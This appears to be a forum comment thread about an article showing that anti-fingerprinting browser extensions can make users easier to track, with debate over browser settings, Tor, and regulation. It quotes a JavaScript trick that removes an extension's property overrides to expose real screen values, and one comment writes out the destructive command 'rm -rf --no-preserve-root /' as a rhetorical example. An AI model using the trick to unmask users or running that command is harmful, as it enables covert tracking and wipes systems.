> There you go, the website will now see the same display resolution for everybody, right? Well, that’s unless the website does this:
delete screen.width;
delete screen.height;
> And suddenly screen.width and screen.height are restored to their original values. Fingerprinting can now use two data points instead of one: not merely the real display resolution but also the fake one. Even if that fake display resolution were extremely common, it would still make the fingerprint slightly more precise.
> Is this magic? No, just how JavaScript prototypes work. See, these properties are not defined on the screen object itself, they are part of the object’s prototype. So that privacy extension added an override for prototype’s properties. With the override removed the original properties became visible again.
This seems like a flaw in the browser extension model. There should be a way of overriding these properties outside the page's javascript environment itself, before it's initialized, in a way that's immutable to anything that runs afterwards.
Regarding protecting screen width and height, on firefox you can use privacy.resistFingerprinting.letterboxing (the tor browser has that enabled by default)
Where does one find out about these random about:config values that don't exist by default? Thought I'd enabled all privacy.resistFingerprinting.* settings, but it turns out there's at least one that I'd never heard of. How much other functionality does Firefox have that is completely undiscoverable?
Search the addon store for "Privacy Settings", it does just that. It's a good way to quickly toggle privacy settings should they impact a site's functionality.
The overall challenge for this seems similar to the challenge of reproducible builds. How do you eliminate every single measure to deal with a system quirk and so get the same VM results everywhere?
Basically, you want the VM to encapsulate everything and give the same result everywhere. You need a theoretical approach, a system of encapsulation and testing. But if you get that, the benefits would extend beyond anti-finger-printing, to privacy and also to making the platform reliable.
Whonix [1] attempts to achieve this, if I am understanding what you are saying correctly. The operating system consists of two virtual machines, a "Workstation" and a Tor "Gateway", running Debian GNU/Linux. All communications are forced through the Tor network to accomplish this.
I worked on browser fingerprinting and countermeasures during my PhD. In one paper, we showed that in the case of an anti canvas fingerprinting extension (canvas defender I think) we were able to extract the seed used to randomise the canvas on each. Since by default the seed was constant, you could use it for tracking: https://hal.inria.fr/hal-01820197 (the paper also talks about other anti fingerprinting techniques).
Did you also evaluate fingerprintjs in that context?
Also, did you use css tracking techniques, too? Because there are hundreds of them, especially since the logical conditions spec.
In my own Browser I'm trying to "fake" behaviours, so that it looks like an e.g. Chrome useragent is browsing the website. I'm also filtering a lot of CSS and HTML that could be abused to track users which is, honestly, a lot.
Even the Accept header alone is enough to identify the engine. If you then use a clever webfont you'll have the navigator's version and OS identified due to antialiasing behaving differently...
I'm also curious how you evaluated the fingerprintability...is there a project that you were using for that, which someone could maybe test their own browser against?
Nevermind my last question, I've found your project on github that you used to test the fingerprintability (fp-scanner) [1] and wanted to let others know.
It's stealth [1] and the tl;dr is that I'm trying to build a browser that doesn't compromise on tracking, so it has to have a peer-to-peer cache and some intercepting features, such as rewriting files before the malicious parts reach the client.
It's still very prototypical, so use with care. Lots of things don't work yet.
Nice research! Was that trick with mutation observers necessary however? If they add a constant noise vector, all you have to do is creating a canvas with known data, then call toDataURL() and compare what you get to the original data?
Because any kind of predictable noise can be easily calculated and removed. And randomized noise that changes on each call can be removed by making the call multiple times and averaging out the values. So a constant noise value isn’t the worst possible idea, as long as it cannot be retrieved of course.
Fingerprinting is an exploit, an attack on the person and machine. It is tracking using mechanisms that were not meant for tracking.
It is without consent and it is without user control (you can clear cookies, you can't clear the fingerprint you've let on thousands of website you browse every week).
Cookies, Local Storage (and IP) should be the only legally authorised means of tracking
Ad slots are often sold and resold through various exchanges, platforms and marketplaces. If each entity in this chain is liable if fingerprinting happens, then fingerprinting will quickly be just as toxic as other kinds of exploits and mostly disappear from the ecosystem.
For a site to be completely out of reach of the US/EU, all of the involved companies (site operator, fingerprinting provider, company paying for the advertising, ad network provider + the other middlemen involved in serving that ad) would have to have zero connection to the US/EU.
No, but as a community we have limited resources, and it makes more sense to focus on the technical solution than the legislative, which is usually a long slow process and never gets done what you want after all the lobbyists get their hands in it.
Yes and no; it's still a cat and mouse game. You prevent one way, fingerprinters will find another way. And sometimes, the cure may be worse than the disease.
What also makes this a little different is that there's not many nefarious actors that truly benefit from fingerprinting random people. Fingerprinting is very useful in large scale operations, and it's hard to maintain a large scale web presence as an outlaw.
I fully agree that fingerprinting should be outlawed by privacy directives. But writing such a law correctly is really tough.
Yeah I'm all for better privacy laws. Highly in favor actually. But this seems like the type of problem where you can't tackle from a single direction. I have to imagine there is a way to combat many of these tactics (at least enough to make them difficult) but I don't have the faintest clue of how to combat something like canvas fingerprinting which essentially is exploiting the silicon lottery.
I do not think laws go far enough because we live in a global society and laws don't exactly apply globally.
It's really hard to make it impossible for people to kill each other. That's why we put some protections in place where they make sense, but otherwise rely on making it illegal and punishing people who do it anyways.
Making fingerprinting illegal will solve nothing. GDPR and the cookie law rarely get applied in real life (and when they do the punishment is laughable). The only real solution is a technical one - a browser that respects your privacy.
The only way that I think a law could assist with this would be if the governments would force all websites of legal businesses to work without javascript as well as via tor, but even then it will go unenforced.
That being said, I do not think that fingerprinting is an exploit as browsers come build-in with technologies that are meant for fingerprinting (see the ping attribute for example).
> It is without consent and it is without user control
How is that true? If you don't visit X site then X site can't fingerprint you. I'd say technically it's the user's fault if they run random code on their computer and using a browser that sends this information back to the fingerprinting party.
I'd say most of the best sites of the internet could be read just fine w/o Javascript or even with just wget.
If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?
Getting browser-fingerprinted is technically the user’s fault in the same way it’s technically my fault if I die in a car crash because of some mechanical defect that I could have detected if I’d just made a habit of regularly dismantling my car to inspect every part of it, applying expert engineering knowledge to identify and fix any dangerous problem(s) (including design defects).
Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever is something we should avoid if our goal is to build a society for the common good. The whole point is to watch each other’s backs, not to create a web of obscure threats where only the truly paranoid can remain safe and avoid being exploited.
>Allowing predatory and/or negligent entities to entrap people with less-than-expert knowledge of the relevant industry/technology/whatever
Indeed, a lot of companies are paying a lot of people a lot of money to spend a lot of their working hours figuring out newer and more-resilient ways of doing this stuff. How long has it been since persistent Flash cookies? Looks like sometime around 2009:
I think there's a project out there for an enterprising public-interest researcher to graph how many of these attempts and techniques were developed and popularized after Facebook started allowing people outside of universities to register for an account.
> If someone made an application that downloaded web pages and executed the contents with SUDO privileges, would I be exploiting someone if my website was 'rm -rf --no-preserve-root /'?
“If someone gave me the key to their front door so I could drop off amazon packages but I actually used it to come in and destroy all their valuables would it really be MY fault?”
The action of destroying the valuables is the crime. Writing down instructions on how to destroy them is just speech. If the owner (or someone else) executes those instructions then they are the actor and the responsible party.
Sure, but that's an issue with those websites, not the law. The law doesn't mandate to have a fullscreen modal that says "We value your privacy" with a big button that allows all cookies and myriad tiny buttons to disallow them individually.
If websites choose to sacrifice usability to be able to fingerprint users, that's on them.
The problem with laws is they never get them right in the first place, and that goes double with anything technology, and then once they are law it is almost impossible to get them changed.
"It doesn't matter what the data is, it should be: - unique to a sufficiently small group of people"
"What you'd rather want is finding the largest group out there and joining it."
Presumably there is a threshhold for how large the group must be before the value of fingerprinting to advertisers drops.
That is one question.
Another question is what value to the advertiser is there, if any, in the data contained in the fingerprint itself (beyond its value in forming a fingerprint).
Hypothetical. User disables Javascript, CSS, does not send Cookies, does not send User-Agent. User only sends a minumum number of headers needed to retrieve the page. For example, Host: and Connection: only.
Putting aside arguments about whether or not this user is more or less "unique" than other users (the size of the group sending minimal data may be small), as well as any arguments about "breaking websites", is the data in the fingerprint valuable to advertisers.
For example, is the advertiser interested in guessing whether the user is using a Javascript and CSS-enabled browser that stores cookies, etc. Will the advertiser perceive the user as a more or less worthy target than another user due to the specifics of the fingerprint.
The point is that the fingerprint identifies you, that's why it's called a fingerprint. A user only sending `Host:` and `Connection:` bought a Nintendo Switch on Site A last week. Another user only sending `Host:` and `Connection:` visited Site B, so we assume it's the same person and show them an ad for Breath of the Wild.
It's not like anyone targets ads to people with specific screen resolutions (and I don't think people would care if they did). The problem is that the data is used to track your activity. The information it contains is "are you the same person as that other visit we tracked".
This is valid point if the user is making a purchase. In that case, the user will likely need to be using a popular browser loaded with graphical features, with images, CSS, Javascript and cookies enabled. In practice, it would be impossible to make a purchase via web with only Host: and Connection: headers. (How many websites engaging in online commerce require neither images, Javascript nor cookies.) That said, there may be instances where web users are not engaging in commerce or other uses that require graphics, cookies and interactivity (submitting forms, etc.). It would seem futile to show ads to users who may not see them due to their client potentially not showing images or running Javascript.
Even without any features enabled and not sending any headers, fingerprinting would let the server track what pages you visit and when (even across websites).
There's not much they'd do with that information (as you say, while it's technically possible, no one cares enough to make an advertising system that works without JavaScript).
The main use case would probably be a primitive way to track which pages are visited in which order, how popular various links are, which paths people took to get to a specific page, etc. Normal tracking stuff which I don't personally have a problem with, but privacy activists often tend to.
> This bind() call makes sure the getter looks like a native function. Exactly what we needed.
Even the example given as finally working will show difference with the native method, the bound function will have a property `name` set to `bound`, while the native one has a `name` property set to `get width`.
My opinion on this is that only the browser can really foil fingerprinting based on surveying the properties of DOM objects.
Probably true, however, is it feasible for anti-fingerprinting technology to be sufficiently standardized that website authors can tell "oh, they're using anti-fingerprinting", but not derive more details?
If a piece of anti-fingerprinting software hides more information than it reveals, it's a net positive. If it does the opposite, it's actively harmful. There's probably a nice formulation of this in terms of entropy, but I can't quite state it, so hopefully this makes sense.
1. Everybody uses js. If you have it turned off, you are in a very tiny group, and now you’re easier to track. Remember that js is not the only mechanism to fingerprint a user.
2. Much of the web does not work with js turned off.
There is no better way against fingerprinting than disabling js, you might be in a very tiny group, but tons of tracking scripts will fail to work, which means you will traceable by less parties.
If a website forces me to use js in order to use it, I will question it, 98% of them is not worth it in my case.
Remember js was invented to add websites dynamism, not to serve for surveillance capitalism. (Okay, Big corporations was involved in creation of js, but that does not constitute every action they take)
My guess is that "sufficiently standardized" has to come from browser-makers. If what my browser reveals (at the default settings) is that I'm using Safari 13, and little more, then it could actually be low-information.
I know, the solution presented there isn’t perfect. But IMHO it’s as close as it gets, and it should be sufficiently advanced that detection should be complicated due to differences in browsers and extensions.
No, as close as it gets is privacy.resistFingerprinting. Extensions shouldn’t even try to do this. (I’ve actually never heard of an extension that tries to do this.)
Yes, I’ve been doing this in the past elsewhere. Quite a messy affair, you have to overwrite `Function.prototype.toString` – meaning for all functions, no real way to do it for a single function. And then you have to be very careful because your overwritten functions runs in an environment you don’t control. Not sure whether implementing this in a completely tamper-proof way is possible.
Well that meshes rather conveniently with the fact the almost crushingly dominant browser out there now has little incentive to really foil fingerprinting.
For screen height specifically there may be an alternative way to get to that information that would be more difficult to patch: css media queries. It says deprecated but not unsupported.
As someone who worked on a system that did fingerprinting as an alternative to cookies for non-nefarious reasons, I can tell you the best way to not be fingerprinted is to just use Safari on the newest iPhone.
Not because iPhones or Safari are any more private. Just because it's a fixed size browser that you can't customize with extensions and looks identical to 20% of all other sessions.
Nothing will stop someone from rolling their own primitive tracking and hoping to fly under the radar of governments.
However, major advertisers and tracking companies are established companies with significant presence in the US and EU. They need servers everywhere to ensure low latency. I don't see how they could work around it if half of their business model is made illegal by Western governments. They'd have to return to doing tracking by ip and cookies (and maybe localstorage, whatever the law exempts) only. I don't see why that shouldn't be enough.
I agree in principle that fixing the browsers to remove fingerprinting vectors is the correct approach, and making tracking illegal is not. I just think making it illegal would work, at least mostly, because companies that are good at tracking would have to comply.
Another solution is to click on every damn ad you are shown. Millions of people doing this to billions of ads will collapse the value and make this kind of advertising a waste of money.
I've never used it myself so I don't know if it still works but I remember reading about it here on HN a few years ago or so.
I think however that if it even still works there is a risk that you may start being prompted with a lot more CAPTCHAs. But again, haven't tried it so don't know if that would happen or not.
That won't work. Clicks are not the currency of digital ads, if everyone does this, it's an easy baseline to account for and eliminate the noise. It's a "cute" idea though that's not even a little bit disruptive.
Advertiser only pay for clicks when it comes to search ads, but there's a whole other world of display advertising. Marketers run campaigns with different strategies, direct response, sales, etc. 99% of ads are bought and sold on views anyway. I'll admit I was hyperbolic when I said this will have 0 impact. It w.ill be annoying, but it won't really make an impact in the grand scheme of things in my opinion. Source: I've worked in ad tech since 2005.
I don’t think that’s the whole picture though. There would still be a valuable business interest in collecting all of this data even if it wasn’t used to directly advertise products to people.
An easy example in the ad tech space would be ad attribution. You don’t have to use any personal identifying information to actually run the specific advertisement to the user for but the PII is then used to correlate whether the ad was effective or contributed to a purchase.
I am not sure what you mean with 'Nigerian prince', but since a lot of e-mail scammers claim to be nigerian princes I will assume you meant that.
The problem isn't that some tiny website somewhere uses fingerprinting, because they can't follow you around the web.
The problem is companies like Google tracking people around the internet. You can fine them if it turns out that they use fingerprinting techniques to track people. Seems pretty straight forward to me.
A legal solution? Legal solutions are never "very simple".
There will be an army of corporate lawyers that are going to try to find loopholes against an army of legislators trying to close them. Plus a few trolls using the new laws to threaten businesses. What starts with a simple idea quickly becomes a monstrosity like GDPR.
If you think that GDPR is a step in the right direction, I've got a bridge to sell you.
Here is how GDPR is likely to pan out in a few years. Some big companies get sued under GDPR. This sets precedents and makes complying with GDPR more expensive. Because it is now harder to comply with GDPR, that becomes a barrier to entry for new companies. The fact that the barrier to entry exists makes the big companies more profitable. And the fact that the regulatory scheme improves their profit margins will incentivize the internet giants to engage in regulatory capture and improve their profit margins even more.
The result? The big internet companies wind up like Brer Rabbit. They say, "Don’t throw me into the briar patch."
>Now one could come up with schemes to change this value regularly, but fact is: making users stand out isn’t the right way.
I don't know that I understand the reasoning behind this. The idea behind it is that it isn't the unique fingerprint that is valuable, it is correlation between different captures of the same unique fingerprint that is valuable. So a randomized fingerprint would he unique, but only for one session, and so the data has no value. If anyone understands the reasoning and could explain how I'm wrong I'd appreciate it.
…which has its own track record of subtle website breakage, something that is difficult to notice and impossible to mitigate short of disabling this globally. Don’t get me wrong, it’s nice that this exists, but it’s disabled by default for a reason. There are no silver bullets here.
> …which has its own track record of subtle website breakage, something that is difficult to notice and impossible to mitigate short of disabling this globally. Don’t get me wrong, it’s nice that this exists, but it’s disabled by default for a reason. There are no silver bullets here.
If Firefox had bigger marketshare, that breakage would magically turn into bugs in the broken websites.
I find it helpful to realize when websites are taking measures to track me. If their site is broken by privacy protections, maybe I don't want to be using that site any more.
It tends to make animations sluggish, see for example https://github.com/framer/motion/issues/441. That’s not because they are trying to track you but simply because requestAnimationFrame (which has its legitimate uses) can potentially be used for fingerprinting. No regular user is going to make the connection between broken functionality and this setting, and I’ve seen developers waste lots of time on this.
I actually use Firefox to resist fingerprinting, but it's definitely annoying and not for everyone. For one, all times are presented to me in UTC now. I understand why Firefox doesn't present my real timezone, but it's kind of absurd to complain that the website is broken in that case and not the JS API.
resistfingerprinting works by making JS APIs less useful, even if used legitimately. If you rely on something that is both accurate and distinct to a user for functionality, that functionality os going to be broken by fingerprinting mitigation. There is no "fingerprinting API" that can simply be disabled, it's a combination of many APIs that all have real-world not-evil uses.
My only concern with enabling it by default is that it might just advance the arms race. As well intentioned as the DNT header was, enabling it by default ultimately led to it being completely meaningless. I could see the potential for it making a comeback if there were some sort of legislation behind it giving it teeth.
Those aren’t comparable at all. DNT is a header that required cooperation; nothing to work around. privacy.resistFingerprinting actually solves fingerprinting, and if it were enabled by default it would be incredibly effective. (It won’t be anytime soon, because it breaks many features that average users rely on, via average websites - but individual aspects of it could trickle in.)
If you were worried that determined parties would develop new tracking technologies as a response, rest assured that they’re always doing that.
A user-agent should do what it thinks is in the users best interest. People don't want to have to micromanage it. If it needs to be set up manually it's undermining itself and preventing it's own success. Ultimately it was not a good offer, and Microsoft, not being in the ads business, was correct in rejecting it.
EDIT: Removed wording about the intentions of the inventors.
> The inventors of DNT wanted to look good without actually changing anything
I don't believe that's a fair characterisation at all. The inventors of DNT may have been over-optimistic about potential adoption, but the intention was most certainly to bring about change.
> enabling it by default ultimately led to it being completely meaningless
No, DNT was completely meaningless from the moment it was proposed. Enabling it by default was just Microsoft pointing out that the emperor had no clothes. I don't even agree with you that it was well-intentioned; IMO it was a bad faith effort to push a non-fix, to try and hoodwink people into not calling for regulation and/or technical solutions with actual teeth.
Solutions which require cooperation from hostile attackers (i.e. advertisers) are not solutions.
I've been using Tor with proxy disabled[1] ever since that fingerprint tester[2] was posted a while ago. I figure of all people forking and hardening a web browser, I trust the tor project the most. I'm no tracking expert, but it's the only way I've been able to score a non-unique fingerprint.
What about randomizing some values on every load to make existing, and additional values (as described in the article), result in new (and therefore useless) fingerprints on every load?
Then you will be the one presenting a new bogus value on every page load – something that makes you recognizable as part of a very small group. As explained in the article, random values are not the way.
I do not agree. First, being recognized as part of a group is better privacy-wise than being uniquely identified. And second, yes your unusual values will stand out, but as they always change, it makes it harder to link the browsing sessions together, and lower the confidence of the algorithm. It makes it harder to _track_ the profile in the long term.
Fingerprinting works by grouping people. The smaller the group, the better. And the group where values change constantly is bound to be very small.
Your assumption seems to be that these changes won’t be recognized. But they are very easy to recognize, e.g. by grouping the values by IP address. Same IP address but constantly changing random values? Yes, that’s a very reliable fingerprint.
DuckDuckGo Privacy Essentials implement GPC as well, not sure about any other extensions. So ideally it won’t be usable to recognize Privacy Badger, rather a comparably large group of users of privacy solutions. Ideally of course this would be adopted by browsers eventually. Not saying that this necessarily makes it a good idea, we’ll have to see whether this will do more good than DNT.
For those saying that fingerprinting should be illegal, how does this balance against the idea that a GET request should never be illegal? Not that I don't despise it, I just can't see how that's not a slippery slope.
That's one way. Another way is to use Safari on an iOS device. This has the advantage of making your activity look exactly like other ordinary iOS users, rather than painting a huge "hey, I'm using Tor Browser" target on your head.
In the context of the article I was commenting on, which is titled "Anti-fingerprinting extensions tend to make fingerprinting easier" what do you think I mean?
Can't answer for the above poster. But after reading both your posts, I'm not entirely sure what you mean in any context. It could mean any of the below in this context and none make sense.
Don't use Javascript to do anti-fingerprinting? (JS is the only language available to extension writers)
Disable JS in your browser? (Breaks much of the web)
.
Don't use JS for web development? (I need to pay my bills)
PS: Guessing games are a poor means of communicating a point.
"Don't use JS for web development? (I need to pay my bills)"
This is not what I meant, but I will say that you don't need to pay your bills by making the web any more of a spyware and adware infested sewer than it already is.
You as a developer and a human being have a choice of what to do with your life and your career.
No one is forced to be a JS developer, and it's ridiculous to pretend you are.
It doesn't mean that you in particular are. But the web is spyware and adware infested. That's just a fact. And that stuff doesn't write itself.
There are huge number of spyware and adware authors out there. It's very likely that quite a few of them are HN readers, and a pretty good chance that they're this article itself (as it concerns their business).
Do I have any reason to believe that you in particular are one of them? No.
Can I address such people when I reply to someone in a thread on browser fingerprinting who claims they need to write JavaScript to pay their bills? Yes.
You have remarkably taken a comment which makes little sense and made it make less sense with each successive post. Eventually, there will be zero meaning to it entirely.
> Is this magic? No, just how JavaScript prototypes work. See, these properties are not defined on the screen object itself, they are part of the object’s prototype. So that privacy extension added an override for prototype’s properties. With the override removed the original properties became visible again.
This seems like a flaw in the browser extension model. There should be a way of overriding these properties outside the page's javascript environment itself, before it's initialized, in a way that's immutable to anything that runs afterwards.